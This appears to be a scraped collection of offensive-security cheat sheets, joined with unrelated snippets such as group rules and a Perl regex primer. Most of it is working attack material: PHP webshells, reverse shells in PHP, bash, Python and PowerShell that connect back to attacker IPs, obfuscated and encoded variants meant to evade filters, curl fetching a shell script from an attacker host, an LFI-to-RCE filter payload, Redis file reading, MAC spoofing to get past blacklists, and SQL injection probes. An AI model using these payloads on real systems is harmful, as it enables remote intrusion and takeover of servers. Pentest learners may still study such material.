Security

This cheat sheet contains common PHP reverse shells and webshell snippets that work in different scenarios. 1. Basic Webshell Using system() <?php system($_GET['cmd']); ?> Usage: Execute commands by passing cmd parameter in URL. Example: http://target.com/webshell.php?cmd=ls 2. PHP Reverse Shell Using One-liner with fsockopen() php -r '$sock=fsockopen("10.9.50.114",3232);exec("/bin/sh -i <&3 >&3 2>&3");' Run this on target if you can execute PHP code directly. Connects back to your listener on port 3232. 3. PHP Reverse Shell Using Named Pipe & Netcat <?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.50.114 4242 >/tmp/f")?> Uses a named pipe (/tmp/f) for stable reverse shell. Requires nc (Netcat) on the target machine. 4. PHP One-liner Bash Reverse Shell (Backgrounded) <?PHP exec("nohup /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.5/9001 0>&1' > /dev/null 2>&1 &"); ?> Runs bash reverse shell in the background. Useful to keep shell persistent after HTTP request ends. 🔥 Tips & Notes Replace IP and ports with your attacker machine’s IP and desired port. Use nc -lvnp <port> on your machine to catch the reverse shell. Some functions like exec(), system() might be disabled — test alternatives (passthru(), shell_exec(), popen()). If nc is not installed on the target, try pure PHP or bash based shells. Always check if the web server user has permissions to execute commands or create named pipes. Combine these shells with Chankro or php-reverse-shell for better evasion.

This cheat sheet shows useful Python reverse shell one-liners and a PowerShell reverse shell generator in Python. 1. Python3 Reverse Shell One-liner python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.50.114",3232));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' Connects back to attacker IP 10.9.50.114 on port 3232. Uses socket, duplicates file descriptors for stdin/stdout/stderr. Spawns an interactive /bin/sh shell. Works on most Linux systems with Python 3 installed. 2. Python Script to Generate PowerShell Reverse Shell Command (Base64 Encoded) #!/usr/bin/env python3 import sys import base64 def help(): print("USAGE: %s IP PORT" % sys.argv[0]) print("Returns reverse shell PowerShell base64 encoded cmdline payload connecting to IP:PORT") exit() try: (ip, port) = (sys.argv[1], int(sys.argv[2])) except: help() payload = '$client = New-Object System.Net.Sockets.TCPClient("%s",%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' payload = payload % (ip, port) cmdline = "powershell -e " + base64.b64encode(payload.encode('utf16')[2:]).decode() print(cmdline) How to use: Run this script: ...

Target File .htaccess Output with PHP String Filters No Filter Applied Output: Testing PHP Filter Payload: php://filter/convert.base64-encode/resource=.htaccess Output: VGVzdGluZyBQSFAgRmlsdGVy Payload: php://filter/string.rot13/resource=.htaccess Output: Grfgvat CUC Svygre Payload: php://filter/string.toupper/resource=.htaccess Output: TESTING PHP FILTER Payload: php://filter/string.tolower/resource=.htaccess Output: testing php filter Payload: php://filter/string.strip_tags/resource=.htaccess Output: Testing PHP Filter This filter remove any HTML or PHP tags from the file contents. PHP Payload: <?php system($_GET['cmd']); echo 'Shell done!'; ?> Payload for LIF to RCE: php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+&cmd=whoami Output: www-data

Redis allows the execution of Lua scripts through the EVAL command. If Redis is misconfigured or exposed to attackers, the Lua scripting engine can be used to execute arbitrary commands, including reading files on the system. File Read via EVAL Command You can read the contents of a file (e.g., /flag.txt) using the EVAL command in the Redis interactive shell: EVAL "return io.popen('cat /flag.txt'):read('*a')" 0

bash -c 'bash -i >& /dev/tcp/10.10.10.14/9001 0>&1' rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f Reverse Shell Payload with Encoded Command bash -c echo${IFS}YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTAuMTQvOTAwMSAwPiYx|base64${IFS}-d|bash bash -c {echo,YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTAuMTQvOTAwMSAwPiYx}|{base64,-d}|{bash,-i} Best way to escape bad character (Recommended) echo "bash -c 'exec bash -i &>/dev/tcp/10.10.14.37/9001 <&1'" > revshell.sh curl$IFS'10.10.14.37/revshell.sh'$IFS'-o'$IFS'/tmp/revshell.sh' bash$IFS'/tmp/revshell.sh' Reverse Shell by using octal escape sequences Generating RevShell (escape sequence) echo -n "/bin/sh -c 'sh -i >& /dev/tcp/10.10.14.56/9001 0>&1'" | od -An -vto1 | tr -d '\n ' | sed 's/\([0-7]\{3\}\)/\\&/g' echo -n "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.56\",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/sh\")'" | od -An -vto1 | tr -d '\n ' | sed 's/\([0-7]\{3\}\)/\\&/g' Generating RevShell (Hex escape sequence) echo -n "sh -c 'exec sh -i &>/dev/tcp/10.10.14.56/9001 <&1'" | xxd -p|tr -d '\n'|sed 's/../\\x&/g' Executing RevShell (Never forgot to URL encode if you are sending via HTTP/s method) printf '\057\142\151\156\057\163\150\040\055\143\040\047\057\142\151\156\057\163\150\040\055\151\040\076\046\040\057\144\145\166\057\164\143\160\057\061\060\056\061\060\056\061\064\056\065\066\057\071\060\060\061\040\060\076\046\061\047'|sh Additional Shell Options and Tools Don’t forget to check with other shells such as sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, and bash. Additionally, consider using Socat for more flexibility: ...

1. Stay Focused on Learning & Skill Development: This group is a knowledge hub for ethical hacking, cybersecurity, and Kali Linux. ✅ Ask questions, share knowledge, and help each other grow! ✅ All posts must be relevant to these topics. 🚫 Basic Kali errors? Ask in the Community Chat, not as a post. 💡 Tip: Search before asking! Many common issues are already discussed. We’re here to learn, not to clutter the group with unnecessary posts. ...

To scan for rpcbind on a network and check NFS shares, use the following command: sudo nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount $IP # Scanning port 111 for rpcbind and list NFS shares Listing Mounted Partitions on the Network To list the mounted partitions of a network system, use: showmount -e $IP # List the exported directories on the NFS server Mounting rpcbind Directories on Local Machine To mount a remote NFS directory on local machine. In this example, the directory /var is mounted from the remote server with IP 10.10.122.178. ...

This method allows users to change their WiFi adapter’s MAC address persistently. It also enables users to bypass MAC address blacklisting by network owners, as it allows connection to WiFi networks with a spoofed MAC address. Step 1: Writing a systemd Service Create a systemd service to change your MAC address and place it in the /etc/systemd/system/ directory with the name mac-spoofer.service. cat /etc/systemd/system/mac-spoofer.service [Unit] Description=MAC Address Change/spoofing wlo1 Wants=network-pre.target Before=network-pre.target BindsTo=sys-subsystem-net-devices-wlo1.device After=sys-subsystem-net-devices-wlo1.device [Service] Type=oneshot User=root ExecStart=/usr/bin/ifconfig wlo1 down ExecStart=/usr/bin/macchanger -r -b wlo1 ExecStart=/usr/bin/ifconfig wlo1 up [Install] WantedBy=multi-user.target Step 2: Creating a Dispatcher Script Create a script in the /etc/NetworkManager/dispatcher.d/ directory and grant it executable permission. This directory contains scripts to handle various network-related events, which are automatically executed in response to specific events managed by NetworkManager. ...

Identifying SQL Injection Vulnerability Parameters Comments in SQL -- MySQL Linux style --+ MySQL Windows style # Hash (URL encode while use) --+- SQL comment ;%00 Null Byte ` Backtick To ascertain SQL injection vulnerability in parameters, test various symbols and observe any error or unusual behavior. Common symbols include: id=[Nothing] id=' id='' id=" id=` id=') id=") id=`) id=')) id=")) id=`)) Examples of SQL Injection Testing Perform SQL injection testing with different payloads. If the payload results in an error or unexpected behavior, it might indicate a vulnerability. Examples include: ...

Perl provides powerful operators for manipulating strings using regular expressions. Here’s a breakdown of each operator with examples: s/// (Substitution Operator) Syntax: s/old-pattern/new-pattern/ Purpose: Replaces occurrences of old-pattern with new-pattern in a string. Example: s/John/Doe/ replaces the first instance of “John” with “Doe”. Example 1: Replace “John” with “Doe” text = "Hello John. John is a friend."; regex = s/John/Doe/; # Result: "Hello Doe. John is a friend." Example 2: Replace “white” with “black” ...